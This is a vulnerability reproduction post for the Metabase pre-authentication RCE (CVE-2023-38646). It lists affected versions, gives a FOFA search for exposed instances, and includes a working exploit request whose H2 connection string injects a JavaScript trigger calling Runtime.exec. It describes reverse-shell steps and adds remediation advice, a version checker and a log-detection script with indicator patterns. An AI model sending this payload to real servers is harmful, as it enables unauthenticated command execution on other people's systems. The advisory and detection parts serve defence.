Metabase RCE vulnerability reproduction (CVE-2023-38646)

0x01 Product Introduction

Metabase is an open source data analysis and visualization tool. It lets users connect to a range of data sources (databases, cloud services and APIs) and then query, analyze and visualize the data through an intuitive interface.

0x02 Vulnerability Overview

An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary commands on the server with the privileges of the account running the Metabase server.

Note that the patched version must also be installed (its setup process completed) before the vulnerability is actually fixed; otherwise the instance can still be exploited.

0x03 Affected versions

Metabase open source 0.46 < 0.46.6.1

Metabase Enterprise 1.46 < 1.46.6.1

Metabase open source 0.45 < v0.45.4.1

Metabase Enterprise 1.45 < 1.45.4.1

Metabase open source 0.44 < 0.44.7.1

Metabase Enterprise 1.44 < 1.44.7.1

Metabase open source 0.43 < 0.43.7.2

Metabase Enterprise 1.43 < 1.43.7.2
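The version list above is easy to misread because the fix releases carry a fourth component (0.46.6 is still affected, 0.46.6.1 is not). The following script is an added example, not part of the original post; it takes a version string as you would read it from the instance's about page (assumed format: optional "v" prefix, dot-separated integers) and classifies it against exactly the ranges listed above.

```python
# Added example (not from the original post): classifies a Metabase version
# string against the affected ranges listed in section 0x03 above.
# Assumed input format: optional "v" prefix followed by dot-separated integers,
# e.g. "0.46.5", "v1.45.4.1".

# Per affected branch (major, minor): the first fixed release from the table.
# Open source releases are 0.x, Enterprise releases are 1.x with the same minor.
FIRST_FIXED = {
    (0, 46): (0, 46, 6, 1), (1, 46): (1, 46, 6, 1),
    (0, 45): (0, 45, 4, 1), (1, 45): (1, 45, 4, 1),
    (0, 44): (0, 44, 7, 1), (1, 44): (1, 44, 7, 1),
    (0, 43): (0, 43, 7, 2), (1, 43): (1, 43, 7, 2),
}


def parse_version(text):
    """'v0.46.5' -> (0, 46, 5); raises ValueError on anything else."""
    text = text.strip()
    if text[:1] in ("v", "V"):
        text = text[1:]
    parts = text.split(".")
    if len(parts) < 2 or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a Metabase version string: {text!r}")
    return tuple(int(p) for p in parts)


def classify(version_text):
    """Return 'vulnerable', 'fixed' or 'not listed' for one version string.

    Tuple comparison handles the four-part fix releases correctly:
    (0, 46, 6) < (0, 46, 6, 1), so 0.46.6 is vulnerable and 0.46.6.1 is fixed.
    Branches the table does not mention (0.42, 0.47, ...) are reported as
    'not listed' rather than guessed either way.
    """
    version = parse_version(version_text)
    fixed = FIRST_FIXED.get(version[:2])
    if fixed is None:
        return "not listed"
    return "vulnerable" if version < fixed else "fixed"


def triage(version_texts):
    """Map each version string to its classification, e.g. for a fleet inventory."""
    return {v: classify(v) for v in version_texts}


if __name__ == "__main__":
    # Constructed sample inventory, not real hosts.
    for v, status in triage(["0.46.5", "v0.46.6.1", "1.45.4", "0.47.0"]).items():
        print(f"{v:>10}  {status}")
```

A "fixed" result from the version number alone is not the end of the check: as the post notes, the fixed build also has to complete its installation before the vulnerability is closed, so confirm that the instance's setup has actually been finished.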

0x04 Reproduction environment

FOFA:app="Metabase"

0x05 Vulnerability Reproduction

exp

POST /api/setup/validate HTTP/1.1
Host: your-ip
Content-Type: application/json

{
    "token": "token值",
    "details":
    {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules":
        {},
        "details":
        {
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('执行的命令')\n$$--=x",
            "advanced-options": false,
            "ssl": true
        },
        "name": "test",
        "engine": "h2"
    }
}

PS: This method only works via the H2 database engine.

Get a valid token

GET /api/session/properties HTTP/1.1
Host: your-ip
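The two requests above (the token fetch from /api/session/properties and the POST to /api/setup/validate with an H2 connection string that chains extra settings and a CREATE TRIGGER statement) are what a defender should be looking for in reverse-proxy or WAF logs. The script below is an added example, not part of the original post or of Metabase itself; it runs over a few constructed request records (assumed to be dicts with source address, method, path and raw body, which is not any particular product's log format) and flags the setup-validation requests whose H2 "db" string carries the indicators shown in the request above.

```python
import json
import re

# Constructed sample records (not real traffic). Each one is what a reverse
# proxy or WAF might have logged for a request to Metabase, body included.
SAMPLE_REQUESTS = [
    {"src": "10.0.0.5", "method": "GET", "path": "/api/session/properties", "body": ""},
    {"src": "10.0.0.5", "method": "POST", "path": "/api/setup/validate",
     "body": json.dumps({"token": "<setup-token>", "details": {
         "engine": "h2", "name": "test", "details": {
             "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;"
                   "TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER x BEFORE SELECT ON "
                   "INFORMATION_SCHEMA.TABLES AS $$//javascript\n<payload>\n$$--=x"}}})},
    {"src": "192.168.1.20", "method": "POST", "path": "/api/setup/validate",
     "body": json.dumps({"token": "<setup-token>", "details": {
         "engine": "postgres", "name": "warehouse", "details": {
             "host": "db.internal", "dbname": "analytics"}}})},
]

# Indicators taken from the request shown in the post: trace output switched on,
# a CREATE TRIGGER statement and a JavaScript trigger body inside the
# connection string. None of these belong in a legitimate H2 "db" value.
H2_INDICATORS = (
    re.compile(r"TRACE_LEVEL_SYSTEM_OUT", re.I),
    re.compile(r"\bCREATE\s+TRIGGER\b", re.I),
    re.compile(r"//javascript", re.I),
)


def extract_h2_db(body_text):
    """Return details.details.db of a validate request if engine is h2, else None."""
    try:
        body = json.loads(body_text)
    except (ValueError, TypeError):
        return None
    details = body.get("details") if isinstance(body, dict) else None
    if not isinstance(details, dict):
        return None
    inner = details.get("details")
    if not isinstance(inner, dict) or details.get("engine") != "h2":
        return None
    db = inner.get("db")
    return db if isinstance(db, str) else None


def inspect_request(req):
    """Return the reasons one request looks like CVE-2023-38646 abuse (empty if clean)."""
    reasons = []
    if req["method"] != "POST" or req["path"] != "/api/setup/validate":
        return reasons
    db = extract_h2_db(req["body"])
    if db is None:
        return reasons
    # The H2 engine by itself is a weak signal; the chained settings are the tell.
    reasons.append("h2 engine in setup validation")
    if ";" in db:
        reasons.append("connection string chains extra H2 settings")
    for pat in H2_INDICATORS:
        if pat.search(db):
            reasons.append(f"matched {pat.pattern}")
    return reasons


def scan(requests):
    """Return (src, reasons) for every request that tripped at least one rule."""
    hits = []
    for req in requests:
        reasons = inspect_request(req)
        if reasons:
            hits.append((req["src"], reasons))
    return hits


if __name__ == "__main__":
    for src, reasons in scan(SAMPLE_REQUESTS):
        print(src, "->", "; ".join(reasons))
```

In practice the GET to /api/session/properties followed shortly by a POST to /api/setup/validate from the same unauthenticated source is itself worth an alert on an instance whose setup was completed long ago, since nothing legitimate should be re-running setup validation there.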

DNSlog verification

Reverse shell

PS: In environments where a reverse shell cannot be obtained directly, the following approach can be tried.

Write a reverse shell script

Use Python to start an HTTP server so the target can download the script

The download succeeds

Start a listener on the VPS and execute the script

Reverse shell obtained

0x06 Remediation advice

Interim mitigation

Restrict access sources with network ACL policies, for example by allowing requests only from specific IP addresses or address ranges.

Upgrade

Fixed versions have been released. All affected users are advised to visit the official website as soon as possible and update to the corresponding security release.

For users of the open source version: the fixed source code has not yet been published officially, so download the prebuilt jar file from the releases page and use that instead.

For Docker users, pull the latest version of the image to update. Back up your data before starting the upgrade.

Whichever fixed version is used, make sure the installation process is completed and the application can be logged into and used normally afterwards; only then is the vulnerability actually fixed. As a general security measure, take unused services offline promptly.


Source: blog.csdn.net/qq_41904294/article/details/131990310